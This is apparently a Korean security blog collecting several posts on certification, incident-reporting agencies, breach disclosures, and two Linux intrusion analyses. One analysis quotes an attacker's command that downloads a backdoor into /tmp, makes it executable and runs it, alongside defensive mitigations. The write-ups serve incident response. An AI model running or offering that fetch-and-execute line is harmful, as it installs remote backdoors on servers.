우린 어떠한 기준에 있어 최소한의 기준에 부합하면 그 기준을 통과 한것으로 간주를 한다. 이를 '합격' 또는 '인증' '패스' ...여러가지 용어로 혼합하여 사용을 한다.

최소한에 합격점수 '60'점을 통과 하면 합격하는 시험이 많다. 굳이 꼭 100%을 맞아야 하는것은 아니다. 마찬가지로 각종 정보보호 규제 및 제도등의 기본적인 체크리스트를 통과 하게 되면 '인증서'를 배부해 준다.

그런데 만약, 이렇게 인증을 많은 기업이 침해사고가 당했다면?

상당히 난감한 일이고 인증 신청 기업이나 심사원, 또 그리고 그 인증을 해준 관련 기관도 많이 난감해 질 것이다. 하지만 위험과 취약성이라는 것이 100% 완벽 한 것은 없다. 다만, 그 위험성과 취약성을 우리가 수용가능한 위험으로까지 감소시키는 것이 목적인 것이다.

마찬가지로 어떠한 인증제도를 통과 했다고 해서 100% 완벽하다고 이해서는 오산이다. 그럼 어떻게 해야 하는가?

각 당사자 입장에서 생각해보자

  • 인증신청기관 - 어렵게 준비하여 기존에 주먹구구식의 정보보호 대응에서 조금 더 체계적이고 기술적이고 프로세스적으로 만들어 놓았는데 침해사고를 당했다고 한다면 담당자 및 해당 기업은 상당히 난감할 것이다. 또한 해당 기업 이미지 측면에서 상당한 타격을 입을 것이다. 그럼 어떻게 해야 하는가?
    • 인증취득후 지속적인 관리 - 인증후에 꾸준한 관리를 하여야 하고, 인증이 끝난것이 아니라 이제 시작이라는 마음으로 더 관리를 해야 한다.
    • 이행증적관리 - 그때 그때 처리하여 이행 증적관리를 하고 인증후 침해사고시 끼칠 파장을 생각하면 조금 더 신경을 쓰게 될 것이다.
  • 인증심사기관 - 인증 심사기관은 새로운 기업에게 '인증서 배부' 도 좋고 새롭게 널리 홍보 및 취득과 실적도 좋겠지만 기존에 인증을 통과한 기업과 조직을 잘 관리 하는 것도 중요한 사안이다. 최소한 인증 받은 기관이 침해사고를 당해 언론에 대서특필되서는 안되는 것이다. 고로, 꾸준히 인증기업을 관리 할수 있는 관리 시스템이 도입이 되어야 할 것이다. 이에는 우선 인력증원이 필요하겠다.
  • 인증심사원 - 어떠한 기준에 준하여 그 제도에 최소한의 원칙과 기준(체크리스트)에 통과 할경우를 심사 하는 것이다. 이런측면에서 볼때 그 외적인 부분에서 보강 및 충분히 고려해야 할 사항들도 필자가 심사를 해 본 결과 많이 있었다. 그러기에 담당자와 충분한 이야기와 인식을 같이 하고 심사기관 동안에는 호흡을 같이 하는 자세도 중요하다. 그러기 위해서는 인증심사원은 부단한 이슈와 법률, 트렌드, 기술적 지식 축적을 게을리 해선 안 될 것이다. 추가적인 보안위험성에 대한 부분을 자세히 그리고 그 대응방법까지 구체적으로 잘 제시해 주는 것이 좋다.

문득,  몇년전 기사에 났던 글이 생각나 한번 정리를 해 보았다. 그 기사에 따르면 국가에서 인증해 주는 어떠한 인증을 취득 했음에도 불구하고 여러가지 재난 사건 사고 들이 많이 생기게 되었다. 특히, 언론에서 더욱 부각이 되기 때문에 제도의 취지가 퇴색되는 경우가 있었다.


맺음말

보안은 특히 이러한 제도 운영과 규제에 있어서 상당한 심혈을 기울이고 관리를 해야 한다. 이제는 보안 사건 사고가 일어나면 그에 대한 비용발생 규모도 커지고 있기 때문에 안전하다고 심사하고 검사하고 테스트 한 조직에서 기업이 침해사고가 당했다고 한다면 그 제도 본질적인 의미와 취지가 많이 흐려질 것이다. 인증 심사를 통과한 기업이나 조직에 담당자의 어깨도 무거울 것이라 생각한다. 많은 노력을 기울여 위험을 최소화로 감소시키는 일에 우리 모두 동참해야 할 것이다. @엔시스.



Posted by 엔시스



해킹된 싸이트 안내해주는 zone-h.kr 싸이트 더 위험할수도 있어


해외에서 zone-h.org는 전세계 해킹된 싸이트를 알려주는 싸이트로 유명하다. 국내에서도 많은 해킹을 당하여 이곳에서 리스트화 되는 경우가 많다. 특히 도메인으로 .co.kr이나 .ac.kr 등을 입력해 보면 알수 있다. 따라서 해당 기업 담당자나 관리자들은 수시로 방문하여 자신의 조직 도메인이 리스트에 있지 않은지에 대하여 확인 하기도 한다.


그런데 국내에서도 비슷한 서비스를 하는 곳이 있다. 바로 zone-h.kr 싸이트다. 싸이트 운영자는 좋은 취지에서 운영하고 있고 일부 커뮤니티나 블로그를 운영해 보면 좋은 취지로 하지만 업무외적 시간을 이용하다 보니 사실 운영하는 것이 그리 쉬운일은 아니다.

오늘자 모 언론 기사에서도 올라왔듯이 나름대로 좋은 목적을 가지고 서비스를 하고 있는것이라고 밝혔다.

하지만 이러한 좋은 취지의 목적임에도 불구하고 이를 역이용할수 있는 소지가 있어 주의가 필요하다는 지적이 논의되고 있다. 오늘 지인 한명으로부터 제보를 받아 zone-h.kr에 접속하여 해킹된 싸이트를 모니터링 해 보았다.


그런데 모니터링 하던후 감짝 놀라운 사실을 알게 되었다. 그것은 해킹된 싸이트가 어드민 권한까지 획득되고 있는 것이 모니터링이 되어 누구나 zon-h.kr 에 접속하게 되면 해킹된 싸이트에서 글을 수정을 할수 있는 것이었다. 그건 최초 해킹된 이후 zone-h.kr 싸이트 방문자에 의하여 제2의 제3의 해킹이 될수 있다는 사실이다..




최초의 접속시에 어드민 권한이 획득이 되어 뉴스를 수정할수 있는 상태로 보여진다. 그런데 중요한 것은 실체 최초 해킹자가 싸이트를 조작 할수도 있겠지만 zone-h.kr에 방문하는 사람이면 또 수정을 할수 있었다는 것이다.



그렇게 해서 확인 하던중 오른쪽 빨간 네모 박스에 실시간으로 글이 수정되는 현상을 목격할수 있었다.  실제로 누군가가 방문을 했다가 어드민 권한이 되어 있으니까 호기심에서 싸이트를 일부 수정한게 아닌가 하는 추청을 해 본다.

좋은 취지에서 운영하는 싸이트가 오히려 해가 되면 안되겠다는 생각을 해 보았다. 보안에 관심이 있는 사람이라면 지난해부터 관심 있게 방문하는 싸이트이다. 그런데 얼마전부터 모 언론 뉴스에 하루단위로 메인에 발행됨으로 인하여 더 많은 방문자가 생겼을 것이라고 느껴진다.

아마도 이러한 좋은 의미임에도 불구하고 해당 웹싸이트 담당자는 해킹으로 인한 피해도 있지만 또 다른 해킹을 알려주는 싸이트 방문자로 하여금 피해를 입지 않을까 우려스러운 부분도 있다. 해당 웹싸이트 운영자는 지속적으로 공개할 것인지 아니면 폐쇄적 운영을 할것인지에 대한 고민이 드는 것중에 하나가 아닐까 생각해 본다. @엔시스.

Posted by 엔시스

보통 해킹이나 침해 사고를 당하면 담당자나 기업에서는 상당히 당황하게 됩니다. 하지만 조금만 침착하게 대응한다면 추후 관련 사고를 막을수 있을 것입니다. 따라서 침해사고시 관련기관을 잘 몰라 신고를 하지 않고 그대로 묵인하는 경우가 있는데 어떤 기관이 있는지 초보자들을 위하여 한번 살펴 보겠습니다.


1. 국가정보원 국가사이버안전센터
   정부, 공공, 교육 등 주요기관 관련 각종 침해사고 신고 및 상담
   Tel : 02)3432-0462
   http://www.ncsc.go.kr



우선 국가공공기관이나 지자체 같은 경우에는 국가정보원 산하에 있는 국가 사이버안전센터에 신고를 하시면 됩니다. 특히 공공기관이나 교육 지자체 같은 경우에는 침해사고나 해킹을 당하면 그 피해가 커져 버릴수 있기 때문에 침해사고를 당하면 즉시 관련 기관과 협조를 하여 사고를 수습하고 재발 방지에 총력을 기울여야 할 것입니다.


2. 한국정보보보진흥원
   1) 인터넷 침해사고 대응지원센터
     해킹사고, 게임사이트 및 포털사이트를 사칭하는 피싱사고, 보안 취약점 등 신고
     신고메일
     Tel : 118
     http://www.krcert.or.kr


민간 기업이나 개인이 침해사고나 해킹등을 당하였을 때 신고하는 기관입니다.. 여러가지 기술적인 부분도 해결이 가능하고 민간 기관에 대하여 대응을 하는 정보보호관련 기관입니다.. 아직까지도 KISA에 대하여 알지 못하는 분들도 계시더군요.. 홈페이지 변조나 DDoS 공격 같은 경우 혼자 힘으로 막으려고 하지 말고 관련 기관에 협조를 구하여 대응을 한다면 조금 더 신속하고 효율적으로 대처가 가능 할 것입니다..

해당 웹싸이트에선 최근 유행하고 있는 해킹이나 보안 이슈에 대한 기술문서도 제공을하고 있으니 보안에 관심 있는 분들이나 공부를 하고자 하는 분들은 이러한 기술문서를 참고로 하여 어떠한 기술적 문제로 인하여 공격이 들어왔는지 또는 공격이 이루어 지고 있는지에 대하여 연구를 해 보시면 좋겠습니다..

또한 현재 KISA에서는 국가공인 정보보호전문가 자격증 (SIS) 시험을 주관하고 있기 때문에 관련 기술문서는 필기,실기 시험에도 도움이 되고 있으니까 많은 공부를 해 보시기 바랍니다.


3. 경찰청 사이버테러대응센터
   주민등록번호 도용, IP추적, Voice 피싱, 인터넷상의 아이템사기, 사용자ID도용, 사기, 해킹/바이러스 유포 등
   사이버범죄 수사관련 상담 및 신고
   Tel : 02)3939-112
   http://www.ctrc.go.kr



그 다음 우리가 또 도움을 받을수 있는 곳이 경찰청 사이버테러 대응센터이지요... 실제 주민등록번호 도용이라든지 법적인 해결을 위해서는 사이버테러대응센터에서 도움을 받을수 있습니다. DDoS에 대한 협박이라든지 보이스피싱등 여러가지 도움을 받을수 있겠지요...결국 사이버 범죄에 대한 최종 법적인 잣대를 댈수있는 기관이기도 합니다..따라서 침해사고나 해킹이라고 판단이 된다면 해당 기관에다 협조와 신고를 반드시 해야 겠습니다..


4. 금융감독원 전자민원창구
   은행, 증권, 카드, 보험 관련 분쟁, 금융범죄 등 상담 및 신고
   Tel : 02)1332
  
http://minwon.fss.or.kr


인터넷이 발달함에 따라 사이버상에서 전자 상거래를 많이하게 됩니다..그러다 보면 금융, 즉 돈과 관련된 여러가지 법률적 자문을 구하는 경우가 있습니다.. 인터넷 뱅킹에 따른 범죄라든지..하는 경우에는 관련 기관에도 이렇게 신고를 할수 있는 전담 창구가 있기 때문에 이용을 하시면 되겠습니다. 

특히, 최근에는 보험에 관련하여 여러가지 분쟁들이 많이 이루어 지고 있는데 이러한 문제들도 짚어 줄수 있는 곳이라 생각을 합니다. 


5.  금융보안 연구원 침해사고 센터(KFCERT(Korea Financial CERT)

해킹 신고 메일 주소 :
해킹 신고 전용 전화 : 02-6919-9119

피싱신고서 : 해킹신고서.hwp    해킹신고서.doc    해킹신고서.rtf
http://www.fsa.or.kr/cert.htm


특히 은행권에 대하여 집중 관리해주는 금융보안연구원에서도 침해 사고 센터가 있어 많은 부분을 담당을 해 주고 있습니다..금융에 따른 사고는 엄청난 파장을 몰고 올수 있는 곳이라 해당 침해사고 센터에서 부단히 노력을 하고 있는 걸로 알고 있습니다..
돈과 관련된 부분이다 보니...-_-;;;

 
6. 개인정보 침해신고센터
     주민번호, ID 등 개인정보도용, 회원탈퇴 미조치 등 인터넷상의 개인정보침해 관련 사항 신고
     Tel : 1336
    
http://www.cyberprivacy.or.kr      http://www.1336.or.kr


마지막으로 최근 화두가 되고 있는 개인정보 침해를 당했다고 생각이 들때에는 개인정보 침해 신고센터로 신고를 하시면 됩니다. 여러가지 개인정보보호에 대한 조치를 하고 있으며, 분쟁시에는 개인정보분쟁 조정위원회를 열어 여러가지 분쟁에 따른 결과를 알려 주기도 합니다...

이상과 같이 여러가지 정보보호,정보보안에 대하여 본인이 침해 행위를 당했다고 느껴 질때 어떤 기관에 어떻게 신고할지를 몰라 그냥 묵인을하고 혼자 감내 하는것 보다는 관련 기관에 신고를 하여 적절한 조치와 대응에 따르는 것이 현명한 판단이라 생각이 듭니다..

다만 우려하는 점은 이러한 신고 창구는 마련이 되었는데 얼마나 잘 대응을 해 주는냐가 관건이 되겠습니다,  하지만 이러한 창구가 있음에도 불구하고 제대로 활용되지 못한다면 그것 또한 안타까운 일이 아닐수 없습니다..이미 아시는 분들은 알고 있는 내용일수도 있지만 초보자나 알지 못하는 분들을 위해서 한번 정리 해 보았습니다...관련 창구를 충분히 활용하시길 바랍니다..

@엔시스

Posted by 엔시스

며칠전 한 고객으로부터 서버가 자꾸 다운되고 웹페이지 및 네트워크 접속이 안된다는 민원을 접수하고 서버를 점검하였다. 리눅스서버로 간단한 회사 홈페이지 정도 구동하고 있었다. 서버 관리자는 당연히 초보이고 나름 그래도 관심을 갖는다고는 하였으나 동일증상이 반복된다고 하여 조사해 보았다.


이미 고객은 몇차례 침해 사고를 당한 적이 있어 패스워드 만큼은 보기 드물게 강력한 패스워드를 만들어 사용하고 있었다.

일단 순차적을 살펴 보기로 하자..

# uptime
 14:10:44 up  1:09,  1 user,  load average: 0.00, 0.00, 0.00

# uname -a
Linux  2.6.9-42.0.10.ELsmp #1 SMP Tue Feb 27 10:11:19 EST 2007 i686 i686 i386 GNU/Linux


]# df -k
Filesystem           1K-blocks      Used Available Use% Mounted on
/dev/mapper/VolGroup00-LogVol00
                      68507184  14648208  50379016  23% /
/dev/sda1               101086     19568     76299  21% /boot
none                    517300         0    517300   0% /dev/shm

시간을 조사하고, 리눅스 커널 버전과 디스크 용량과 파티션 정보를 알아 보았다.

# ps -aux|more
Warning: bad syntax, perhaps a bogus '-'? See /usr/share/doc/procps-3.2.3/FAQ
USER       PID %CPU %MEM   VSZ  RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.0  2340  552 ?        S    13:01   0:00 init [3]
root         2  0.0  0.0     0    0 ?        S    13:01   0:00 [migration/0]
root         3  0.0  0.0     0    0 ?        SN   13:01   0:00 [ksoftirqd/0]
root         4  0.0  0.0     0    0 ?        S    13:01   0:00 [migration/1]
root         5  0.0  0.0     0    0 ?        SN   13:01   0:00 [ksoftirqd/1]
root         6  0.0  0.0     0    0 ?        S<   13:01   0:00 [events/0]
root         7  0.0  0.0     0    0 ?        S<   13:01   0:00 [events/1]
root         8  0.0  0.0     0    0 ?        S<   13:01   0:00 [khelper]
root         9  0.0  0.0     0    0 ?        S<   13:01   0:00 [kacpid]

프로세스를 점검해 보았으나 특이 사항을 찾을 수 없었다. 그 다음 가장 간단하면서도 기초적인 상황을 볼수 있는 네트워크 점검이다...만약 어떤 형태로든 침해사고를 당했다면 네트워크 세션 연결과 포트가 열려 있을 것이다.

# netstat -anp|more

211.xxx.xxx.20:32780        203.153.xxx.101:6667         ESTABLISHED 4445/httpd -DSSL

오호..너 지금 딱걸렸어...http 데몬이 의심스러웠다. 이건 왠지 직감,..우선 찍어 놓고..
다음은 혹시 스니핑을 당하고 있지 않은가 해서 스니핑 유무를 살펴 보았다..

]# ifconfig -a
eth0      Link encap:Ethernet  HWaddr 00:A0:D1:E3:02:32
          inet addr:211.xxx.xxx.20  Bcast:211.xxx.xxx.31  Mask:255.255.255.224
          inet6 addr: fe80::2a0:d1ff:fee3:232/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:55249 errors:0 dropped:0 overruns:0 frame:0
          TX packets:65551 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:100
          RX bytes:12122122 (11.5 MiB)  TX bytes:73491573 (70.0 MiB)
          Base address:0xcf00 Memory:fcde0000-fce00000

다행히 스니핑 당하고 있지는 않았다,..스니핑을 당하면 해당 네트워크는 상당한 피해를 초래하게 된다.

httpd     4437 nobody   22u  IPv4   7637       TCP *:80 (LISTEN)
httpd     4445 nobody    3u  IPv4   9409       TCP *:1988 (LISTEN)
httpd     4445 nobody    7u  IPv4  10783       TCP 211.xxx.xxx.20:32780->203.153.xx.101:6667 (ESTABLISHED)
httpd     4446 nobody   22u  IPv4   7637       TCP *:80 (LISTEN)

그 가운데 아까 점찍어 둔 놈을 lsof 명령어와 옵션으로 해당 파일과 포트를 어떻게 사용하고 있는지를 모았는데 httpd 데몬을 가장하고 있었다..

]# lsof -i:32780
COMMAND  PID   USER   FD   TYPE DEVICE SIZE NODE NAME
httpd   4445 nobody    7u  IPv4  10783       TCP finebill.co.kr:32780->ip-101-99-net.express.net.id:ircd (ESTABLISHED)

이 놈이 바로 httpd 데몬을 가장하여 외부에 있는 ircd 데몬과 연결이 되어 irc 채팅 서버로 뚫린 모양이다.

========================================================================================
IP INFORMATION SEARCH : 203.153.xx.xxx
국가 : Indonesia  
ISP : N2C-IFS4
기관명 : Infrastruktur N2C
주소 : PT. NettoCyber Indonesia
IP구간 : 203.153.99.0 - 203.153.99.255
 
inetnum 203.153.99.0 - 203.153.99.255
netname N2C-IFS4
country ID
descr Infrastruktur N2C
descr Jakarta
descr Indonesia
admin-c AD142-AP
tech-c GB82-AP
status ASSIGNED NON-PORTABLE
changed hostmaster@net2cyber.net 20061214
mnt-by MAINT-ID-EXPRESSNET
source APNIC
 
person Aris Dharmawan
nic-hdl AD142-AP
e-mail arisdh@net2cyber.net
address PT. NettoCyber Indonesia
address Menara Rajawali Lt 12
address Mega Kuningan Lot 5.1
address Jakarta 12950
phone +62-21-5761234
fax-no +62-21-5762345
country ID
changed novan@xl.co.id 20040915
mnt-by MAINT-ID-XLNET-N2C
source APNIC
 
person Gede B. Widagdo
nic-hdl GB82-AP
e-mail gede@velo.net.id
address PT. NettoCyber Indonesia
address Menara Rajawali Lt 12
address Mega Kuningan Lot 5.1
address Jakarta 12950
phone +62-21-5761234
fax-no +62-21-5762345
country ID
changed gede@velo.net.id 20070912
mnt-by MAINT-ID-EXPRESSNET
source APNIC
 
그래서 IP 조사결과 인도네시아로 나왔다., 실제 인도네시아 인지 아니면 인도네시아 서버도 뚫린건지 잘 모르겠지만 아무튼 그랬다.

[root@ tmp]# ls -al
total 248
drwxrwxrwx   5 root   root   40960 Mar 28 11:44 .
drwxr-xr-x  24 root   root    4096 Mar 27 13:01 ..
drwxr-xr-x   2 nobody nobody  4096 Mar 27 15:22 .c
-rw-r--r--   1 nobody nobody     0 Mar 27 15:21 cmdtemp
drwxrwxrwt   2 root   root    4096 Mar 27 13:01 .font-unix
drwxrwxrwt   2 root   root    4096 Mar 27 13:01 .ICE-unix
srwxrwxrwx   1 mysql  mysql      0 Mar 27 13:01 mysql.sock
-rw-r--r--   1 nobody nobody 12510 Feb 27 23:07 mysql.txt
-rw-r--r--   1 nobody nobody 12510 Feb 27 23:07 mysql.txt.1
-rw-r--r--   1 nobody nobody 12510 Feb 27 23:07 mysql.txt.2
-rw-r--r--   1 nobody nobody 12510 Feb 27 23:07 mysql.txt.3
-rw-r--r--   1 nobody nobody 12510 Feb 27 23:07 mysql.txt.4
-rw-------   1 nobody nobody 38912 Mar 20 17:09 php2jPgvv
-rw-r--r--   1 nobody nobody 29584 Mar 18 15:52 sess_7330089add1ed9e64f84ef136f02b4ef
-rw-r--r--   1 nobody nobody 29582 Mar 19 02:40 sess_7WR0089add1ed9e64f84ef136f02b4ef
[root@ tmp]#

그리고 나서 발견된 tmp 디렉토리의 수 많은 파일등,...일일이 확인해 보니 아주 봇 들이 난리도 아니었다.  자세한 것은 추후 또 살펴 보기로 하고 일단 해당 봇넷 파일 삭제와 퍼미션 조정들..그리고 방화벽 필터링을 통한 포트 제어 등으로 모니터링 후에 다시 동일한 현상이 일어나면 연락 달라고 했다.  한가지 아쉬운 점은 늘 그렇지만 지금 사용중이 서버라서 함부로 다룰수 없다는 것이다. 그렇다고 무슨 수사기관도 아니고 그럴만한 권한을 위임 받은 것도 아니기 때문에 ..여러가지 대처 방안과 요령을 말해 주고 끊었다.


'Security Incident' 카테고리의 다른 글

httpd 를 가장한 irc 봇넷  (1) 2008.03.29
Posted by 엔시스

최근 포털 다음이고객정보가 해킹을 당했다는 기사로 인하여 도덕성에 문제를 제기 하고 있다. 다음이 이렇게 도덕성에 문제 제기를 받는 것은 지난번 옥션과 대처 방법이 상이하게 다르기 때문이다.

지난번 국내 최대 쇼핑몰 옥션이 해킹을 당하고 가입자에게 일일이 메일을 보내 해킹을 시인을 했던 것과는 대조적이기 때문이다.  왜냐하면 당사자는 그러한 사실을 발표시에는 몰고올 파장을 잘 알고 있기 때문이다.

가능하면 쉬쉬하면서 넘어 가려고 하는 것이 인지상정일 것이다. 그런데 다음이 이번에 그렇게 넘어 가려다 그 사실을 알려지게 되었고 또 다시 논란이 일고 있다.

옥션은 이런 의미에서 좋은 사례로 남을 것이다. 하지만 아직까지 옥션도 해킹 규모라든지 어떻게 해킹이 되었는지에 대한 명확한 해명을 내 놓고 있지 않다.

앞으로 유명 포털이나 기업체에서는 만약의 침해 사고에  스스로 숨기려고 하다가 알려져서 모양새가 이상하게 되었다.  사전에 이러한 사실을 공지 하는 것이 명문화 될 것으로 옥션과 다음 사례에서 나타나게 되었다...

하지만 한가지  남긴 가장 큰 교훈은 이제는 해킹을 당하면 절대 먼저 공지 하지 않을것 같다는 우려감이 있다는 것이다.

이러니저러니 해도 무엇보다 외부 침입을 방지하는데 총력을 기울여야 할 것이다..


 
Posted by 엔시스

설날 연휴를 맞이 하여 보안업계는 큰 사건이 하나 발생하였습니다...아직 연휴중이라 많은 사람들이 알지 못하고 있는 현실이어서 그런데 조금만 관심이 있는 분들이라면 대부분 아실수 있는 내용입니다...

국내 최대 쇼핑몰 경매싸이트인 옥션 해킹으로 의심되는 메일을 회원들에게 전부 발송하였습니다..

왜 침해사고가 의심되는 징후를 감지하고 전체메일을 보낸다는 것은 쉽지 않은 판단일텐데 보냈을까요?

먼저 손을 쓴 것은 아닐까요? 아마 해당 관련 기관에서 분석 자료가 나오면 개인정보에 대한 이슈가 제기 될꺼 같습니다..

국내 약 1/3 국민이 가입해 있는 쇼핑몰 싸이트의 개인정보가 유출 되었다면 심히 걱정이 아닐수 없습니다...명확한 분석 자료가 나와야 할 것입니다..


‘비번’ 바꾸면 해결?…불안감 확산
한겨레신문
개인정보 유출에 따른 피해 확산이 우려되자 한국정보보호진흥원(KISA)과 인터넷 업체들이 소속된 한국인터넷기업협회는 지난 6일부터 네이버를 중심으로 비밀번호(패스워드) 변경 캠페인을 벌이고 있다. 박광진 한국정보보호진흥원 개인정보보호지원센터 단장은 “같은 아이디로 여러 사이트를 이용하는 경우가 많아 피해 예방차원에서 비밀 ...

옥션발 인터넷 '비상'···비밀번호 변경 긴급 캠페인
아이뉴스24
이에따라 한국정보보호진흥원(KISA)과 사단법인 한국인터넷기업협회는 6일부터 옥션 해킹 피해가 확산되는 것을 예방하기 위해 국내 인터넷 기업들과 공동으로 이용자 패스워드 변경 캠페인을 하고 있다. 이번 캠페인은 개인정보 유출로 인한 2차, 3차 피해 확산을 미연에 방지하기 위한 것. 네이버, 다음 등 대형 포털사이트를 시작으로 설 ...



이와 관련하여 네이버에 접속 할려니까 갑자기  비밀번호를 강제로 바꾸려고 하는 메세지 창이 떴습니다...

이 무슨...지금까지 파란과 같은 포털에서는 몇개월에 한번씩 비밀번호 변경 정책을 적용하였지만 네이버는 하지 않았었습니다...보안에 자신이 있었나 봅니다..하지만 옥션까지 당하니까 이제 가장 기본적인 사용자 눈높이에 맞춘 비밀번호 정책을 사용하는가 봅니다..

그런데 갑자기 뜸끔없이 비밀번호를 바꾸라니요...

" 옥션이 남에 일이 아니긴 아닌가 봅니다.."



Posted by 엔시스


국내 최대  경매싸이트인 옥션이 회원들에게 아래와 같은 메일을 보내고 있다.

사용자 삽입 이미지

혹시 옥션을 이용하는 많은 분들께서는 비밀번호 변경등을 하여 사전 정보 유출을 막으시기 바랍니다...이미 유출 되었는지도 모르지요.,..아마 설 연휴가 끝나면 파장이 클것 같네요..지금은 연휴 기간이라 ...잠잠하지만 ..



 

Posted by 엔시스




ARP 스푸핑에 대한 분석자료입니다.

공격을 간단하게 설명하면 웹서버 내부나 취약점에 근거한것이 아닌 ARP프로토콜을 이용한 공격으로 상당히 공격이 다양화 지능화 되고 있다는 사실을 알수있다. 많은 참고가 되기 바랍니다.

출처: KISA 침해사고 대응센터


Posted by 엔시스
1. 개요
시스템 부팅이 안되면서 부팅시 참조되는 초기화 파일에 손상을 입었으며 운영체제는 리눅스로 싱글 부팅도 안됨.

2. 침해사고형태
운영체제 취약성으로 보이는 익스플로잇과 툴킷이 다량 숙주하고 있었으며 다시 부팅시에
관리자에게 피해를 주기위하여 rc.init 파일의 변조로 인하여 원격 관리자에게 애로사항을 줌
이는 원격지에 서버가 있다면 서버가 있는 곳에 가서 콘솔로 작업을 해야함

3. 침해사고 내용 및 증상

cd /tmp;wget URL/r0nin;chmod -c 777 r0nin;./r0nin

PsychoPhobia Backdoor is starting...OK, pid = 20570

- Host Name: IP del server

- Port: 1666

- Protocol: Telnet
백도어가 숙주하고 있었으며 프로코콜은 텔넷을 사용하고 있었다.

- 네트워크에 과부하를 일으키고 원격 접속시에는 로그인 상태가 상당히 느려 지는 현상을
  보이고 있다.
- 또 다른 툴킷을 설치하여 다양한 attack을 시도하기 때문에 관리자는 여러가지 측면에서
  검색을 해 보아야 한다.
사용자 삽입 이미지

                                    <실제 해킹된 서버 화면>

4. 처리결과

#mount -o remount,noexec,nosuid /tmp
#iptables -A INPUT -s 0.0.0.0/0 -dport 1666 -j DROP

We need some FIREWALL POLICY.
이는 /tmp 디렉토리에 있어 마운트 해제하고 기본탑제 방화벽인 iptables에서 해당
포트를 일단 drop 시킨다, 또는 해당 프로세스를 찾아 kill 시킨다

그이후에 자세한 분석을 통하여 더 숙주되어 있을 파일을 찾아본다

5. 결론
이는 취약한 운영체제 즉, 낮은 버전의 리눅스 운영체제를 사용하고 있었으며 또한 관리자
역시 시스템에 대한 관리를 전혀 하고 있지 않는 상태였다.  우선 침해사고시에는 누구보다
해당 업체 시스템 관리자가 허둥지둥하게 된다. 혹시 모를 데이터 유출이나 삭제시에 책임
이 본인에게 있기 때문에 성급한 요구를 하기도 한다. 위와 같은 조치는 일단 시스템이 정지 되는 최소한의 시간을 줄이기 위함으로 일단 하나하나씩 처리해 나가야 한다.  해킹을 당하면
무언가 찜찜한 마음에 무조건 다시 설치하고 설정하기엔 차후에 있을 또다른 침해사고를
부르기 때문에 철저한 분석이 뒤따라야 한다.  따라서 관리자들은 백업을 일상화 해야 하며 지금도 틈만 있으면 노리는 해커들로부터 안전하게 지키려면 누구보다 부지런해야 한다는 것을 오늘 다시 체험 하였다.

***참고 사항***
아래 참고 하시길...
오늘과 내일: 홍석범 문서 내용 요약.

1777 권한: 누구나, 제한 없이 파일을 올리고, 실행 할수 있다.(필요악)

#find / -perm 1777
------------------------------------------------------
/dev/shm , /var/tmp, /tmp, /var/spool/vbox
------------------------------------------------------

#rpm -qfi /var/spool/vbox
------------------------------------------------------
isdn4k-utils: Utilities for configuring an ISDN subsystem.
------------------------------------------------------
- 사용하지 않는 것이라면, 과감하게 지운다.
#rpm -e isdn4k-utils

/dev/shm, /var/tmp, /tmp: 광범위하게 쓰이는 녀석들이라 지울 수 없다.
#rm -rf /var/tmp && ln -s /tmp /var/tmp (관리 편의를 위해서)
#mount -o remount,noexec,nosuid /dev/shm /tmp
noexec, nosuid 실행과 s비트를 사용을 막는다.

#/bin/sh /tmp/test.sh 와 같은 우회 방법이 존제 함으로 /tmp 폴더의 주기적인 체크를 통한 관리 메일을 발송 한다.
아파치 인증 걸기 (htaccess)
HTTPD
#vi httpd.conf
---------------------------------------------------------
<Directory "/home/test.com/">
   Options ...
   AllowOverride FileInfo AuthConfig Limit
   Order allow,deny
   Allow from all
</Directory>
AccessFileName .htaccess
---------------------------------------------------------

DIRECTORY
#cd /home/test.com
#vi .htaccess
---------------------------------------------------------
AuthName "TEST LOGIN"
AuthType Basic
AuthUserFile /home/test.com/conf/.htpasswd
<Limit GET>
       order deny,allow
       deny from all
       allow from all
       require user admin
</Limit>
---------------------------------------------------------

AUTHIZATION
#cd /home/test.com/conf
#htaccess -c .htasswd admin
- type your password
Posted by 엔시스
국가 사이버 침해사고 사례-2005년도입니다.

시간 나실때 한번씩 읽어 보시기
바랍니다...


Posted by 엔시스